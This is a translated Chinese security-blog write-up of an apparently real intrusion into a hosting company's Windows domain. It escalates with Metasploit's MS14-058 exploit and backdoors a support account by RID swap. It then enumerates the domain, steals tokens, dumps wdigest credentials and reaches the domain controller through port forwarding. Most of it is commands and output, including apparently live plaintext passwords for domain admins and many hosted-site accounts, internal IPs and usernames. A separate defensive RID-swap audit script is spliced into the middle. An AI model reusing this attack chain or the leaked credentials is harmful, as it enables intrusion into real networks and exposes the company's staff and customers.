
A Real-World Record: From MS14-058 to the Domain Controller

潇湘信安
Published 2021-04-29 17:07:31
Filed under the column: 潇湘信安

Disclaimer: Most articles on this public account come from the author's day-to-day study notes; a small number are reposted with the original author's authorization or from whitelisted public accounts. Reposting without authorization is strictly prohibited; to repost, contact us for whitelisting. Do not use the techniques in these articles for illegal testing; any adverse consequences arising from doing so have nothing to do with the article's author or this public account.

  • User: SUPPORT_388945a0
  • Pass: 7a57a5a743894a0e

msf exploit(ms14_058_track_popup_menu) > use post/windows/manage/enable_support_account
msf post(enable_support_account) > set password 7a57a5a743894a0e
msf post(enable_support_account) > set session 2
msf post(enable_support_account) > exploit
[*] Target OS is Windows .NET Server (Build 3790, Service Pack 2).
[*] Harvesting users...
[+] Found SUPPORT_388945a0 account!
[*] Target RID is 1004
[*] Account is disabled, activating...
[*] Swapping RIDs...!
[*] Setting password to 7a57a5a743894a0e
[*] Post module execution completed

The administrator had changed the Remote Desktop port away from 3389; based on experience, 3392 was guessed to be the new port number. The remote connection screen showed a domain, which means this machine is a member of the HOSTING domain. Running domain enumeration commands from the webshell returned "System error 5 has occurred. Access is denied." That is an access-denied error, a permissions problem.

ipconfig /all                        //network adapter configuration, domain membership and IP range
ping backbox                         //show the IP address for this machine name
net view                             //list the computers in the current domain
net view /domain                     //see how many domains there are
net user /domain                     //list all domain users
net group /domain                    //list the domain groups
net group "domain admins" /domain    //list the current domain admins
net time /domain                     //the domain controller usually also acts as the time server
dsquery server                       //list the domain controllers
dsquery subnet                       //list the domain's IP address ranges

Because meterpreter session 2 is already running as SYSTEM, the shell command can be used to drop into a DOS command prompt and run the commands above to collect domain information (screenshot missing).

msf post(enable_support_account) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > shell
Process 13204 created.
Channel 2 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

c:\windows\system32\inetsrv>net group "domain admins" /domain
net group "domain admins" /domain
The request will be processed at a domain controller for domain hosting.lunarpages.com.

Group name     Domain Admins
Comment        Designated administrators of the domain

Members
-------------------------------------------------------------------------------
_new_win_user            abbas.khan               akumar
alexb                    alext                    brianl
dgreathouse              dimitriosk               epak
gcager                   gudiyak                  iismon
Jassi                    jayraju                  jmickle
lunarscripts             mike                     mwaqas
richardd                 robotdoggy               rodb
Tsinternetuser           vartamonov               vlaszlo
zafril
The command completed successfully.
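From the defender's side, the enable_support_account output quoted above leaves two concrete traces in local account data: the normally disabled SUPPORT_388945a0 account becomes enabled, and its RID is swapped with the built-in Administrator's (RID 500). The following audit check is an added example, not code from the original post; the account records it runs over are constructed sample data.

```python
# Added example (not from the original post): flag the traces an
# enable_support_account-style RID swap leaves in local account data.
# The account records below are constructed sample data, not from any host.
from dataclasses import dataclass

ADMIN_RID = 500  # well-known RID of the built-in Administrator account


@dataclass
class LocalAccount:
    name: str
    rid: int
    enabled: bool


# Constructed snapshot of a host after the post module ran: the support
# account was re-enabled and its RID (1004) swapped with the Administrator RID.
SAMPLE_ACCOUNTS = [
    LocalAccount("Administrator", 1004, True),
    LocalAccount("Guest", 501, False),
    LocalAccount("SUPPORT_388945a0", 500, True),
    LocalAccount("IUSR_WEB01", 1005, True),
]


def audit_accounts(accounts):
    """Return a list of (account_name, finding) pairs.

    Checks, each derived from the module output quoted above:
      1. SUPPORT_388945a0 should be disabled (the module had to activate it).
      2. Only 'Administrator' should own RID 500, and it should own no other.
      3. No two accounts may share a RID.
    """
    findings = []
    seen = {}
    for acct in accounts:
        if acct.name.upper() == "SUPPORT_388945A0" and acct.enabled:
            findings.append((acct.name, "help-assistant account is enabled"))
        if acct.rid == ADMIN_RID and acct.name != "Administrator":
            findings.append((acct.name, "non-Administrator account holds RID 500"))
        if acct.name == "Administrator" and acct.rid != ADMIN_RID:
            findings.append((acct.name, f"Administrator RID is {acct.rid}, not 500"))
        if acct.rid in seen:
            findings.append((acct.name, f"RID {acct.rid} also used by {seen[acct.rid]}"))
        seen.setdefault(acct.rid, acct.name)
    return findings


if __name__ == "__main__":
    for name, why in audit_accounts(SAMPLE_ACCOUNTS):
        print(f"[!] {name}: {why}")
```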
The dsquery server command shows a domain controller named PHART, and during domain enumeration a computer named PHART was also found in the HOSTING domain, so that machine should be the domain controller, with IP address 172.16.17.208.

c:\windows\system32\inetsrv>dsquery server
"CN=THART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com"
"CN=PHART,CN=Servers,CN=Sandiego,CN=Sites,CN=Configuration,DC=hosting,DC=lunarpages,DC=com"

====== Domain:HOSTING (machines in the domain) ======
\\ARCTURUS = [172.16.17.176]
\\BASH = [172.16.17.197]
\\BLAMO = [172.16.17.112]
\\CASTOR = [172.16.19.62]
\\CELANEO = [172.16.17.221]
\\CEPHEI = [172.16.17.177]
\\INDUS = [172.16.18.30]
\\KENDAL-NEW = [172.16.16.55]
\\KRAZ = [216.***.***.207]
\\PHART = [172.16.17.208]
\\RAPTOR = [172.16.17.199]
\\REGOR = [216.***.***.206]
\\ROCKET = [172.16.16.120]
\\SM-MAIL2-N14 = [172.16.19.129]
\\SMARTERMAIL1 = [172.16.16.129]
\\TRESSA = [216.**.***.9]
\\TUB = [172.16.19.72]
\\VOGA = [67.***.***.33]
\\VPSSQL12 = [172.16.18.169]
\\YED = [216.***.***.203]

Next, load the incognito extension, which can steal tokens on the target host and impersonate users. Listing the tokens available on the target shows two domain admin accounts: HOSTING\dimitriosk and HOSTING\richardd.

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u

Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
TRESSA\codeb7
TRESSA\IWAM_plesk(default)
TRESSA\IWPC_10(techb7)
TRESSA\IWPC_112(techn56)
TRESSA\IWPC_120(csbelts2)
......

Impersonation Tokens Available
========================================
HOSTING\dimitriosk
HOSTING\richardd
NT AUTHORITY\ANONYMOUS LOGON
TRESSA\IUSR_baffledcomics23
TRESSA\IUSR_bridgca
TRESSA\IUSR_canva4
TRESSA\IUSR_cellu12
......
Next we used mimikatz, the French "magic tool", and obtained the plaintext passwords of these two domain admin accounts directly (screenshot missing).

meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================

AuthID      Package    Domain        User                  Password
------      -------    ------        ----                  --------
0;997       Negotiate  NT AUTHORITY  LOCAL SERVICE
0;54487     NTLM
0;141544    NTLM       TRESSA        IWPD_323(jielu0)      1pDH4
0;146820    NTLM       TRESSA        IWPD_276(codeb7)      2FRj#
0;150429    NTLM       TRESSA        psaadm                2a 00 6d 00 48 00 6a 00 40 bc
0;146362    NTLM       TRESSA        IWPD_73(birch11)      2a)hx
0;145281    NTLM       TRESSA        IWPD_404(apsns0)      2i!@!
0;999       Negotiate  HOSTING       TRESSA$               37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 52
0;996       Negotiate  NT AUTHORITY  NETWORK SERVICE       37 9f 4f db ad 52 cf a4 1b 0e f7 c0 33 ad 6c 6a f9 5a 21 aa 57 e3 33 42 b7 2a b3 52
0;143168    NTLM       TRESSA        IWPD_130(leopo1)      A^Xku
0;150476    NTLM       TRESSA        IWPD_390(myp3n0)      AehD8
0;50614744  Kerberos   HOSTING       richardd              B0unc3d
0;87605279  Kerberos   HOSTING       richardd              B0unc3d
0;143575    NTLM       TRESSA        IWPD_231(rmhar0)      BARrc
0;150196    NTLM       TRESSA        IWPC_184(e2esoft0)    C9rFi
0;1669440   NTLM       TRESSA        Plesk Administrator   HOB.5Sd3X88C610rxYL/06.U0UbihUoU
0;148004    NTLM       TRESSA        IWPD_413(manuf5)      I1)cd
0;147957    NTLM       TRESSA        IWPD_375(cellu12)     I6oS)
0;63839802  Kerberos   HOSTING       dimitriosk            TsAk1553!@#
0;56964817  Kerberos   HOSTING       dimitriosk            TsAk1553!@#
0;143880    NTLM       TRESSA        IWPD_179(ringb2)      U&RQo
0;144397    NTLM       TRESSA        IWPD_427(temp02)      Uj$Da
0;49263709  NTLM       TRESSA        SvcCWRSYNC            XgXS0fJkki1120
0;49609545  NTLM       TRESSA        SvcCWRSYNC            XgXS0fJkki1120
0;147191    NTLM       TRESSA        IWPD_334(egorov0)     agA+L
0;147850    NTLM       TRESSA        IWPD_399(smash11)     btj#c
0;82470376  NTLM       TRESSA        codeb7                codebroker1
0;145375    NTLM       TRESSA        IWPD_48(obser14)      d(nlK
0;144068    NTLM       TRESSA        IWPD_302(donas0)      d-1!j
0;56760168  NTLM       TRESSA        robotdoggy            xhn?O8kx!K
0;87616530  NTLM       TRESSA        robotdoggy            xhn?O8kx!K
0;149472    NTLM       TRESSA        IWPD_290(expos12)     xula)
0;147761    NTLM       TRESSA        IWPD_417(marig4)      yy=^(
......
With the domain controller's IP address and credentials in hand, all that remains is to use meterpreter's portfwd command to forward a port and connect to the domain controller; the DC's Remote Desktop port had also been changed to 3392. During testing the author was able to log in to the domain controller and to every machine under it; screenshots are omitted here.

meterpreter > portfwd add -l 1234 -r 172.16.17.208 -p 3392
[*] Local TCP relay created: 0.0.0.0:1234 <-> 172.16.17.208:3392
meterpreter > portfwd delete -l 1234    //remove the forward

0x03 A problem encountered during testing

The author originally wanted to use Metasploit's exploit/windows/smb/psexec module with one of the domain admin accounts to test logging in to machines in bulk, but during testing the following error kept appearing.

msf exploit(psexec) > exploit
[*] Started reverse handler on 192.168.1.10:443
[*] Connecting to the server...
[-] Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (172.16.17.208:445).

Testing in a local Windows 2008 virtual machine showed that this is exactly the error the psexec module returns when the Windows Firewall is enabled. Stopping the firewall service with the DOS command (net stop "Windows Firewall") still produced the same error, but after switching the Windows Firewall off the session came back successfully, and re-enabling the firewall dropped the session again ~.~

msf exploit(handler) > use exploit/windows/smb/psexec
msf exploit(psexec) > set payload windows/meterpreter/bind_tcp
msf exploit(psexec) > set SMBUSER administrator
msf exploit(psexec) > set SMBPASS windows****!@#123
msf exploit(psexec) > set RHOST 192.168.1.9
msf exploit(psexec) > set LPORT 4444
msf exploit(psexec) > exploit
[*] Started bind handler
[*] Connecting to the server...
[*] Authenticating to 192.168.1.9:445|WORKGROUP as user 'administrator'...
[*] Uploading payload...
[*] Created \TFPRuonH.exe...
[+] 192.168.1.9:445 - Service started successfully...
[*] Deleting \TFPRuonH.exe...
[*] Sending stage (770048 bytes) to 192.168.1.9
[*] Meterpreter session 6 opened (192.168.1.10:60880 -> 192.168.1.9:4444) at 2014-12-29 20:12:56 +0800

This article was shared from the 潇湘信安 WeChat public account. Originally published: 2021-04-16.
